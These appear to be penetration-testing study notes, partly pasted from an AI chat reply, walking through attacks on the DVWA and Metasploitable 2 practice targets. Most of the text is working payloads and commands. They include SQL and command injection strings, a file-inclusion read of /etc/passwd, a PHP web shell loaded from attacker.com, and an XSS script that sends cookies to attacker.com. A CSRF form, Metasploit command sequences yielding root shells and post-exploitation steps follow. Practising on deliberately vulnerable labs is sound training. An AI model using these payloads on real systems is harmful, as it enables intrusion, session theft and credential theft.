Web attacks

1. SQL Injection
Objective: Extract database information by injecting SQL queries.

Steps:
1. Go to: DVWA -> SQL Injection.

2. Enter: ' OR '1'='1 in the User ID field.

3. Click: Submit.

4. Result: Displays all users.

Extract Database Version:

' UNION SELECT NULL, version() -- -

Extract Current User:

' UNION SELECT NULL, user() -- -

Extract Database Name:

' UNION SELECT NULL, database() -- -

2. Command Injection
Objective: Execute system commands via web input.

Steps:
1. Go to: DVWA -> Command Injection.

2. Enter: 127.0.0.1; whoami

3. Click: Submit.

4. Result: Displays the current system user.

Web attacks 1
 Additional Commands:
List files: 127.0.0.1; ls

View running processes: 127.0.0.1; ps aux

Get network details: 127.0.0.1; ifconfig

3. File Inclusion (LFI & RFI)

Objective: Include arbitrary files via the URL.

Local File Inclusion (LFI)

1. Go to: DVWA -> File Inclusion.

2. Modify URL: ?page=../../../../etc/passwd

3. Result: Retrieves /etc/passwd .

Remote File Inclusion (RFI)

1. Host malicious PHP script on a web server:

<?php system($_GET['cmd']); ?>

1. Modify URL: ?page=http://attacker.com/shell.php&cmd=whoami

2. Result: Executes remote command.

4. Cross-Site Scripting (XSS)

Objective: Inject JavaScript into the web application.

Stored XSS
1. Go to: DVWA -> XSS (Stored).

2. Enter Payload: <script>alert('XSS')</script> in the comment field.

3. Click: Submit.

4. Result: Alerts when the comment is viewed.

Reflected XSS
1. Go to: DVWA -> XSS (Reflected).

Web attacks 2
 2. Modify URL: ?name=<script>alert('Hacked')</script>

3. Result: Alerts immediately.

Steal Cookies:

<script>
var i = new Image();
i.src="http://attacker.com/steal.php?cookie="+document.cookie;
</script>

5. Brute Force Login

Objective: Automate login attempts.

Steps:
1. Go to: DVWA -> Brute Force.

2. Use Burp Suite to capture login request.

3. Send Request to Intruder.

4. Load Wordlist (rockyou.txt).

5. Start Attack and check valid responses.

6. CSRF (Cross-Site Request Forgery)

Objective: Force a user to perform actions without consent.

Steps:
1. Go to: DVWA -> CSRF.

2. Capture request for password change.

3. Create Malicious HTML Form:

<form action="http://dvwa.com/csrf.php" method="POST">

<input type="hidden" name="password_new" value="hacked123">
<input type="hidden" name="password_conf" value="hacked123">

Web attacks 3
 <input type="submit" value="Click Me">
</form>

1. Trick victim into clicking.

These are the technical steps for each attack on Easy Mode in DVWA. Let me
know if you need detailed exploitation for any! 🚀

Metasploitable 2 - Metasploit Exploits

Metasploitable 2 is a deliberately vulnerable Linux VM designed for security
testing with Metasploit. Below are some Metasploit modules to exploit different
services in Metasploitable 2.

1. VSFTPD 2.3.4 - Backdoor Exploit

Vulnerable Service: FTP (Port 21)

Exploit Module: exploit/unix/ftp/vsftpd_234_backdoor

Steps:

bash
CopyEdit
msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS <target_ip>
set RPORT 21
run

Result: A root shell on the target system.

2. Apache Tomcat - Weak Credentials

Vulnerable Service: Apache Tomcat (Port 8180)

Exploit Module: exploit/multi/http/tomcat_mgr_deploy

Web attacks 4
 Steps:

bash
CopyEdit
msfconsole
use exploit/multi/http/tomcat_mgr_deploy
set RHOSTS <target_ip>
set RPORT 8180
set HttpUsername tomcat
set HttpPassword tomcat
run

Result: A shell via deploying a malicious WAR file.

3. UnrealIRCd 3.2.8.1 - Remote Code Execution

Vulnerable Service: UnrealIRCd (Port 6667)

Exploit Module: exploit/unix/irc/unreal_ircd_3281_backdoor

Steps:

bash
CopyEdit
msfconsole
use exploit/unix/irc/unreal_ircd_3281_backdoor
set RHOSTS <target_ip>
set RPORT 6667
run

Result: A remote shell.

4. DistCC Daemon - Remote Code Execution

Vulnerable Service: DistCC (Port 3632)
Exploit Module: exploit/unix/misc/distcc_exec

Web attacks 5
 Steps:

bash
CopyEdit
msfconsole
use exploit/unix/misc/distcc_exec
set RHOSTS <target_ip>
set RPORT 3632
run

Result: A root shell.

5. Samba smbd 3.0.20 - Command Execution

Vulnerable Service: Samba (Port 139/445)
Exploit Module: exploit/linux/samba/usermap_script

Steps:

bash
CopyEdit
msfconsole
use exploit/linux/samba/usermap_script
set RHOSTS <target_ip>
set RPORT 139
run

Result: A remote shell.

6. MySQL - Authentication Bypass

Vulnerable Service: MySQL (Port 3306)
Exploit Module: auxiliary/scanner/mysql/mysql_login

Steps:

Web attacks 6
 bash
CopyEdit
msfconsole
use auxiliary/scanner/mysql/mysql_login
set RHOSTS <target_ip>
run

Result: Retrieves weak MySQL credentials.

7. Shellshock - Apache Mod_CGI

Vulnerable Service: Apache (Port 80)

Exploit Module: exploit/multi/http/apache_mod_cgi_bash_env_exec

Steps:

bash
CopyEdit
msfconsole
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOSTS <target_ip>
run

Result: A remote shell via Shellshock.

Post-Exploitation
After getting a shell, you can:

Check running processes: ps aux

Escalate privileges: sudo -l

Dump credentials: cat /etc/passwd

Pivot to internal systems.

Web attacks 7